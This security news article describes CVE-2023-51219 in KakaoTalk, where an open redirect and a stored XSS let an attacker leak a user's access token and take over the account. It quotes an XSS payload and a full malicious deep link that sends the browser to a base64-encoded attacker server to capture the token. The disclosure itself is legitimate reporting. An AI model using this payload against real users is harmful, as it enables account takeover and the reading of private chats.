KakaoTalk is an Android application that is predominantly installed and used by over 100 million people.
It is a widely popular application in South Korea that has payment, ride-hailing services, shopping, email etc., But the end-to-end encryption is not enabled by default on KakaoTalk as it is an opt-in feature under the name “Secure Chat”.
Further, this End-to-end encryption is not supported in group messaging or voice calling.
However, KakaoTalk has been discovered with a critical vulnerability that could allow an unauthorized remote threat actor to leak an access token of a victim via an HTTP request header.
In addition, this token can also be used to take over the victim’s user account and read their chat messages by registering an attacker-controlled device.
This vulnerability has been assigned with CVE-2023-51219 and the severity is yet to be categorized.
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According to the reports shared with Cyber Security News, the main entry point of this vulnerability is the CommerceBuyActivity webview which has multiple attack points as follows:
However, though there is an option to leak the Authorization header using GET request, there is small validation there that prevents an attacker from loading any arbitrary attacker-controlled URLs.
To overcome this issue, the code was analyzed which provided information that the path, query and fragment of the URL are using the attacker’s input.
As KakaoTalk has a same origin policy that does not load any arbitrary URLs, researchers were checking to see if there are any kakao domains that are vulnerable to DOM XSS.
There was one endpoint identified that was vulnerable to redirection to any kakao domain.
To leverage this same site open-redirect for malicious purposes, there was an XSS flaw discovered.
This XSS flaw was found in the m.shoppinghow.kakao.com subdomain which used DOM Invader Canary string and already had an Stored XSS payload. The XSS payload was so simple which was “><img src=x onerror=alert(1);>.
So combining this XSS, attackers created a malicious deep link which was kakaotalk://auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Y25001977964/q:”><img src=x onerror=alert(1);>.
This leaked the user’s access token via the Authorization header which was then sent to the attacker-controlled server by encoding the attacker URL to base64.
kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:”><img src=x onerror=”document.location=atob(‘aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv’);”>
As a matter of fact, this token can be used to take over the victim’s Kakao mail account that was used for registration.
Additionally, if the user does not have a Kakao mail account, an attacker can still create a new Kakao Mail account and see the chat messages.
Furthermore, another interesting thing is that the Kakao Mail account overwrites the user’s previous registered mail address without any additional checks.
Further the researchers have also detailed about password reset, via Burp, malicious Deep link creation and a Proof-of-concept has also been published on GitHub.
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